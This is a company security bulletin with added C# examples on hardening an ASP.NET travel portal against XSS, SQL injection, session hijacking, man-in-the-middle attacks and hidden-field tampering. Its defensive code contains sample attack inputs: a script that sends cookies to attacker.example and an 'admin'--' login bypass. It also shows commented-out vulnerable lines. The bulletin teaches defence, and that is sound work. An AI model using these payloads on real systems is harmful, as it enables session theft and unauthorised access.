BULLETINS 
TEKNOKRAAFT


Tips for securing your Online Travel Portal

Posted Date:  January 28, 2011


Implementing the right security model is a vital part of any online portal, and in this newsletter we cover some of the most important points for an online travel portal.

Cross Site Scripting
Cross site scripting (XSS, not to be confused with CSS) is a common attack on websites. Consider the scenario where a user submits a script in an input form; the input is neither validated nor encoded, it is stored, and when another user visits the page the script runs in that user's browser. The textbook demonstration is a pop-up message, but real attacks are silent: common goals are to steal cookies, session identifiers and other sensitive information.

A successfully injected script seriously affects the website and its users, and it is often combined with a phishing attack.
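As an added example (not code from the bulletin or from Teknokraaft), here is what the stored-script scenario looks like on an ASP.NET Web Forms review page, with the vulnerable line beside the fix. The control name (litReview), the review-loading step and the attacker host are assumed; the payload is a constructed sample. Note that ASP.NET request validation would reject this exact string on input by default, but it is a coarse filter and does not cover every context, so output must still be encoded.

```csharp
// Added example (not from the bulletin): rendering a stored customer review on a
// travel-portal page. Control names (litReview), the review-loading call and the
// attacker host are assumed; the payload is a constructed sample.
using System;
using System.Web;
using System.Web.UI;

public partial class ReviewPage : Page
{
    // Constructed: what an attacker types into the review box. Silent, no pop-up:
    // it sends every later visitor's cookies to the attacker's server.
    public const string ConstructedPayload =
        "<script>new Image().src='http://attacker.example/c?'+document.cookie;</script>";

    // Encode for the HTML body context: < > & " become entities, so the browser
    // displays the text instead of executing it.
    public static string RenderForHtml(string untrusted)
    {
        return HttpUtility.HtmlEncode(untrusted);
    }

    // Encode for a JavaScript string literal; a different context needs a different encoder.
    public static string RenderForJsString(string untrusted)
    {
        return HttpUtility.JavaScriptStringEncode(untrusted);
    }

    protected void Page_Load(object sender, EventArgs e)
    {
        string stored = ConstructedPayload;   // stands in for loading the review from the DB

        // VULNERABLE: the stored text is written straight into the page.
        // litReview.Text = stored;

        // FIXED: encoded on output, regardless of what validation happened on input.
        litReview.Text = RenderForHtml(stored);
        // (Equivalent for an asp:Literal control: Mode="Encode" in the markup.)

        // If the review is also handed to client-side script, encode for that context.
        string js = "var review = '" + RenderForJsString(stored) + "';";
        ClientScript.RegisterStartupScript(GetType(), "review", js, true);
    }
}
```

The point of the two encoders is that encoding is context specific: HtmlEncode makes text safe inside HTML, JavaScriptStringEncode makes it safe inside a JavaScript string, and neither substitutes for the other.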

SQL Injection Attacks
A SQL injection attack is a common problem on websites. It arises when text typed into an input field, for example the user name box of a login form, becomes part of the SQL statement that performs a CRUD operation against the database, which effectively lets the user query the database through the input field. If user input is not validated and you build SQL statements by string concatenation, you are exposed to SQL injection.
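As an added example (not from the bulletin), the concatenated login query described above beside its parameterised replacement, using ADO.NET's SqlClient. The table and column names (Users, UserName, PasswordHash), the connection and the attacker input are assumed or constructed; how the password hash is produced is outside this example.

```csharp
// Added example (not from the bulletin): login lookup vulnerable to SQL injection,
// beside the parameterised version. Table/column names (Users, UserName, PasswordHash)
// and the connection are assumed; the attacker input is a constructed sample.
using System;
using System.Data;
using System.Data.SqlClient;

public static class LoginRepository
{
    // Constructed attacker input for the user name box.
    public const string ConstructedUserName = "admin'--";
    public const string ConstructedPassword = "anything";

    // VULNERABLE: the input is concatenated into the statement. With the constructed
    // input the SQL becomes
    //   SELECT UserId FROM Users WHERE UserName = 'admin'--' AND PasswordHash = '...'
    // and the -- comments out the password check, logging the attacker in as admin.
    public static string BuildVulnerableQuery(string userName, string passwordHash)
    {
        return "SELECT UserId FROM Users WHERE UserName = '" + userName +
               "' AND PasswordHash = '" + passwordHash + "'";
    }

    // FIXED: parameters are sent to SQL Server separately from the statement text,
    // so the quote and the -- in the user name are just characters inside a value.
    public static int? FindUser(SqlConnection conn, string userName, string passwordHash)
    {
        using (SqlCommand cmd = conn.CreateCommand())
        {
            cmd.CommandText =
                "SELECT UserId FROM Users WHERE UserName = @user AND PasswordHash = @hash";
            cmd.Parameters.Add("@user", SqlDbType.NVarChar, 64).Value = userName;
            cmd.Parameters.Add("@hash", SqlDbType.NVarChar, 128).Value = passwordHash;

            object result = cmd.ExecuteScalar();
            return result == null || result == DBNull.Value ? (int?)null : (int)result;
        }
    }
}
```

Typed parameters with explicit lengths also reject over-long input early, and the same rule applies to stored procedures: a procedure that builds dynamic SQL from its arguments is just as injectable as concatenation in C#.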

Session Hijacking
Session hijacking means taking over another user's session. It is done either by guessing a session ID or by using a stolen one. Guessing is impractical because ASP.NET uses a random 120-bit session ID; stealing is the realistic route, by cross site scripting, a man in the middle attack, or any other way of reading the user's session cookie.
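As an added example (not from the bulletin), a Web Forms login handler that closes the two gaps the paragraph names: it discards the pre-login session id so a captured one is worthless after login, and it sets the cookie flags that stop scripts and plain HTTP from exposing the cookie. The control names (txtUser, txtPassword, lblMessage) and the use of the built-in Membership provider and forms authentication are assumptions.

```csharp
// Added example (not from the bulletin): login handler for an ASP.NET Web Forms
// portal. Control names (txtUser, txtPassword, lblMessage) and the use of the
// built-in Membership provider and forms authentication are assumed.
using System;
using System.Web;
using System.Web.Security;
using System.Web.UI;

public partial class LoginPage : Page
{
    // Makes the cookie unreadable to script (HttpOnly, defeats cookie theft by XSS)
    // and unsendable over plain HTTP (Secure, defeats sniffing on the wire).
    // Site-wide equivalent: <httpCookies httpOnlyCookies="true" requireSSL="true" />
    public static HttpCookie Harden(HttpCookie cookie)
    {
        cookie.HttpOnly = true;
        cookie.Secure = true;
        return cookie;
    }

    protected void btnLogin_Click(object sender, EventArgs e)
    {
        if (!Membership.ValidateUser(txtUser.Text, txtPassword.Text))
        {
            lblMessage.Text = "Invalid user name or password.";   // same text for both cases
            return;
        }

        // Discard the session the visitor had before logging in, and its id. Without
        // this, an id an attacker planted or sniffed before login (session fixation)
        // stays valid after login. ASP.NET issues a fresh 120-bit id on the next
        // request only if the old cookie is gone, hence the explicit expiry.
        Session.Abandon();
        Response.Cookies.Add(Harden(new HttpCookie("ASP.NET_SessionId", "")
        {
            Expires = DateTime.UtcNow.AddDays(-1)
        }));

        // Authentication state lives in the forms ticket, which ASP.NET signs and
        // encrypts itself; keep the session for non-sensitive state only.
        FormsAuthentication.SetAuthCookie(txtUser.Text, false);
        Harden(Response.Cookies[FormsAuthentication.FormsCookieName]);
        Response.Redirect(FormsAuthentication.GetRedirectUrl(txtUser.Text, false), true);
    }
}
```

Session.Abandon() on its own is not enough: the browser still holds the old ASP.NET_SessionId cookie and ASP.NET will reuse that id for the new session, which is why the cookie is explicitly expired before the redirect.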

Man in middle attack
A man in the middle attack is one in which the attacker sits on the network path between two communicating parties and reads or alters the traffic. A common instance in a portal deployment is the link between the web server and the database server: normally that traffic is not encrypted, so an attacker with access to the network path can sniff it. The same applies to the link between the user's browser and the web server whenever it is not protected with HTTPS.
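As an added example (not from the bulletin), how to make the web-to-database link described above encrypted with SqlClient, plus a check that can be run over every connection string in web.config. The server and database names are assumed and the audited strings are constructed samples.

```csharp
// Added example (not from the bulletin): require an encrypted, certificate-checked
// link between the web server and SQL Server, and audit existing connection strings.
// Server/database names and the sample strings are assumed or constructed.
using System;
using System.Data.SqlClient;

public static class DbLinkSecurity
{
    // Encrypt=True makes the driver use TLS to SQL Server; TrustServerCertificate=False
    // makes it validate the server certificate, so an attacker on the network cannot
    // sit in the middle presenting a certificate of his own.
    public static string BuildConnectionString(string server, string database)
    {
        var b = new SqlConnectionStringBuilder
        {
            DataSource = server,
            InitialCatalog = database,
            IntegratedSecurity = true,      // no SQL password in the string at all
            Encrypt = true,
            TrustServerCertificate = false
        };
        return b.ConnectionString;
    }

    // Returns null if the string is acceptable, otherwise the reason it is not.
    public static string Audit(string connectionString)
    {
        var b = new SqlConnectionStringBuilder(connectionString);
        if (!b.Encrypt)
            return "Encrypt=False: traffic to SQL Server crosses the network in clear";
        if (b.TrustServerCertificate)
            return "TrustServerCertificate=True: any certificate is accepted, so any host can impersonate the server";
        return null;
    }

    public static void Demo()
    {
        Console.WriteLine(Audit(BuildConnectionString("dbsrv01", "OTA")) ?? "ok");

        // Constructed: the kind of string typically found in a web.config.
        Console.WriteLine(Audit("Data Source=dbsrv01;Initial Catalog=OTA;User ID=ota;Password=secret;"));
        Console.WriteLine(Audit("Data Source=dbsrv01;Initial Catalog=OTA;Encrypt=True;TrustServerCertificate=True;"));
    }
}
```

The SQL Server side needs a certificate installed and, ideally, Force Encryption turned on so that unencrypted clients are refused. The common mistake is a self-signed certificate that fails validation, "fixed" by setting TrustServerCertificate=True, which keeps the traffic encrypted but lets anyone on the path impersonate the server.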

Hidden field Tampering
Hidden form fields are under the user's control: whatever you put there comes back unchanged only if the user chose not to change it. If you trust sensitive information stored in hidden fields (a fare, a booking id, a user id) without validating the data coming back from the user, a hacker can tamper with the field. Values must therefore be validated against what the server expects, or, better, not trusted at all and looked up again on the server.

View state is not encrypted by default: it is only Base64 encoded, so a hacker can decode and read it. View state should therefore carry a hash (MAC) that the server checks to detect tampering, and it should be encrypted if it holds anything sensitive. Better still, avoid sending sensitive information to the client and back to the server at all.
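As an added example (not from the bulletin), a booking page that carries the flight id and fare in hidden fields, showing the page settings that make view state MAC-checked and encrypted, and a server-side check that refuses to charge a fare the browser supplied. The control names, the Page directive values and the fare table are assumptions; the fares are a constructed in-memory sample standing in for a database query.

```csharp
// Added example (not from the bulletin): a booking page with hidden fare and flight id
// fields. Control names (hidFlightId, hidFare, lblMessage), the Page directive values
// and the fare table are assumed; the fares are a constructed sample.
//
// In the .aspx, so view state is MAC-checked and encrypted, not merely Base64:
//   <%@ Page EnableViewStateMac="true" ViewStateEncryptionMode="Always" ... %>
//   <asp:HiddenField ID="hidFlightId" runat="server" />
//   <asp:HiddenField ID="hidFare" runat="server" />
using System;
using System.Collections.Generic;
using System.Globalization;
using System.Web.UI;

public partial class BookingPage : Page
{
    // Constructed sample: the server's own fare list (in reality a DB query).
    static readonly Dictionary<int, decimal> Fares = new Dictionary<int, decimal>
    {
        { 101, 12500m },   // TRV-DXB
        { 102,  3200m },   // TRV-BLR
    };

    // The posted hidden value is accepted only if it equals what the server knows.
    // Returns the fare to charge, or null if the post is tampered, stale or malformed.
    public static decimal? ValidatePostedFare(string postedFlightId, string postedFare)
    {
        int flightId;
        decimal fare;
        if (!int.TryParse(postedFlightId, NumberStyles.Integer, CultureInfo.InvariantCulture, out flightId))
            return null;
        if (!decimal.TryParse(postedFare, NumberStyles.Number, CultureInfo.InvariantCulture, out fare))
            return null;

        decimal serverFare;
        if (!Fares.TryGetValue(flightId, out serverFare))
            return null;                                         // unknown flight
        return fare == serverFare ? serverFare : (decimal?)null;  // differs: tampered or stale
    }

    protected void Page_Init(object sender, EventArgs e)
    {
        // Ties the view state MAC to this session, so a view state blob captured
        // from another user's session does not validate here.
        ViewStateUserKey = Session.SessionID;
    }

    protected void btnBook_Click(object sender, EventArgs e)
    {
        // VULNERABLE: decimal fare = decimal.Parse(hidFare.Value);
        // charges whatever the browser sent; a hidden input is editable in any
        // browser's developer tools before the form is posted.

        decimal? fare = ValidatePostedFare(hidFlightId.Value, hidFare.Value);
        if (fare == null)
        {
            lblMessage.Text = "The fare has changed, please search again.";
            return;
        }
        // Proceed with the booking at fare.Value, which is the server's figure.
    }
}
```

Even with the MAC and encryption on, view state protects only what the server put there; an asp:HiddenField is a plain input the user can edit, so the server-side comparison is what actually prevents the tampered fare from being charged.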

Deploy web application
There are several things to do before deploying a website to the production environment that avoid some common security pitfalls:

  • Remove tracing (trace enabled="false") before deployment
  • Disable debug mode (compilation debug="false")
  • Set the custom error page mode to RemoteOnly, so detailed errors are shown only on the server itself
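As an added example (not from the bulletin), a startup check in Global.asax that refuses to serve a production site whose web.config still has any of the three settings above in their development state. The "IsProduction" app setting name is an assumption; the section types and enum values are those of System.Web.Configuration.

```csharp
// Added example (not from the bulletin): refuse to start a production site whose
// web.config still has debug, tracing or full error pages enabled. The settings
// enforced correspond to:
//
//   <system.web>
//     <compilation debug="false" />
//     <trace enabled="false" />
//     <customErrors mode="RemoteOnly" defaultRedirect="~/Error.aspx" />
//   </system.web>
//
// The "IsProduction" app setting name is assumed.
using System;
using System.Collections.Generic;
using System.Configuration;
using System.Web;
using System.Web.Configuration;

public class Global : HttpApplication
{
    // Returns the unsafe settings found; an empty list means the config is deployable.
    public static List<string> FindUnsafeSettings()
    {
        var problems = new List<string>();

        var compilation = (CompilationSection)WebConfigurationManager.GetSection("system.web/compilation");
        if (compilation != null && compilation.Debug)
            problems.Add("compilation debug=\"true\": debug build, symbols and no script timeouts");

        var trace = (TraceSection)WebConfigurationManager.GetSection("system.web/trace");
        if (trace != null && trace.Enabled)
            problems.Add("trace enabled=\"true\": trace output exposes session, cookies and server variables");

        var errors = (CustomErrorsSection)WebConfigurationManager.GetSection("system.web/customErrors");
        if (errors == null || errors.Mode == CustomErrorsMode.Off)
            problems.Add("customErrors mode=\"Off\": stack traces and SQL errors shown to remote users");

        return problems;
    }

    protected void Application_Start(object sender, EventArgs e)
    {
        bool production = string.Equals(ConfigurationManager.AppSettings["IsProduction"], "true",
                                        StringComparison.OrdinalIgnoreCase);
        List<string> problems = FindUnsafeSettings();
        if (production && problems.Count > 0)
            throw new ConfigurationErrorsException("Refusing to start: " + string.Join("; ", problems));
    }
}
```

Failing at startup is deliberate: a misconfigured site that throws on its first request is noticed immediately, whereas one that quietly serves stack traces to the internet is noticed by the wrong people.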

Security Principles
Some core security principles that should be followed during website development:

  • Code Access Security: Run scripts and execute code under a least privileged account, so that if the code is compromised the potential damage is limited.
  • Security in Layers: Place check points in every layer of the application, so that only authenticated and authorized users get through; do not rely on a single check in the user interface.
  • User Privileges: Assign each user the least privilege needed, through roles that define which pages and operations that role may access.
  • Application Failure: When the application fails, make sure it does not leave sensitive data unprotected, and do not show details that could help an attacker exploit a vulnerability in your application.
  • Application Logging: Write application and user errors to error logs, the database and the Windows event log, depending on the severity.
  • Authentication and Authorization: Restrict user access to system level resources such as files, folders and event logs.

Last but not least, have a proper logging mechanism that logs each and every action in your online travel application, and retain those logs for a minimum of one year. You never know when you will need to look at an earlier transaction and see what happened.
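As an added example (not from the bulletin) covering both the Application Failure and Application Logging principles above and the audit logging recommended here: an unhandled-error handler that writes the full detail to the Windows event log and shows the user nothing useful to an attacker, and a helper that records every business action with who, what, when and from where. The event source name, the AuditLog table and its columns, and the error page path are assumptions.

```csharp
// Added example (not from the bulletin): unhandled-error handling and an audit-log
// helper for an online travel application. The event source name, the AuditLog
// table/columns and the error page path are assumed.
using System;
using System.Data;
using System.Data.SqlClient;
using System.Diagnostics;
using System.Web;

public static class PortalLogging
{
    const string EventSource = "OTAPortal";   // assumed; registered once by an administrator

    // Application failure: full detail goes to the event log for the operators, the
    // user is sent to a generic page. Call this from Application_Error in Global.asax.
    public static void HandleUnhandledError(HttpContext context)
    {
        Exception ex = context.Server.GetLastError();
        if (ex == null) return;

        string user = context.User != null && context.User.Identity.IsAuthenticated
            ? context.User.Identity.Name : "anonymous";
        string detail = string.Format("User={0} Url={1} IP={2}\n{3}",
            user, context.Request.RawUrl, context.Request.UserHostAddress, ex);

        EventLog.WriteEntry(EventSource, detail, EventLogEntryType.Error);

        context.Server.ClearError();                 // suppress the default error page
        context.Response.Redirect("~/Error.aspx");   // no message, no stack trace, no SQL text
    }

    // Audit every business action (search, book, cancel, refund ...) with who, what,
    // when and from where, so a transaction can be reconstructed months later.
    // Parameterised, since the details column often contains user-supplied text.
    public static void Audit(SqlConnection conn, string user, string action, string details, string clientIp)
    {
        using (SqlCommand cmd = conn.CreateCommand())
        {
            cmd.CommandText = "INSERT INTO AuditLog (LoggedAt, UserName, Action, Details, ClientIp) " +
                              "VALUES (@at, @user, @action, @details, @ip)";
            cmd.Parameters.Add("@at", SqlDbType.DateTime2).Value = DateTime.UtcNow;
            cmd.Parameters.Add("@user", SqlDbType.NVarChar, 64).Value = user;
            cmd.Parameters.Add("@action", SqlDbType.NVarChar, 64).Value = action;
            cmd.Parameters.Add("@details", SqlDbType.NVarChar, -1).Value = (object)details ?? DBNull.Value;
            cmd.Parameters.Add("@ip", SqlDbType.VarChar, 45).Value = clientIp;   // 45 fits IPv6
            cmd.ExecuteNonQuery();
        }
    }
}
```

Keep the audit table append-only for the application's database account (INSERT but no UPDATE or DELETE), otherwise an attacker who gets in through the application can erase the record of having done so, and the one-year retention means nothing.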

Author: Pradeep M.S

Pradeep works as a Sr. Software Engineer at Teknokraaft, in our OTA team.
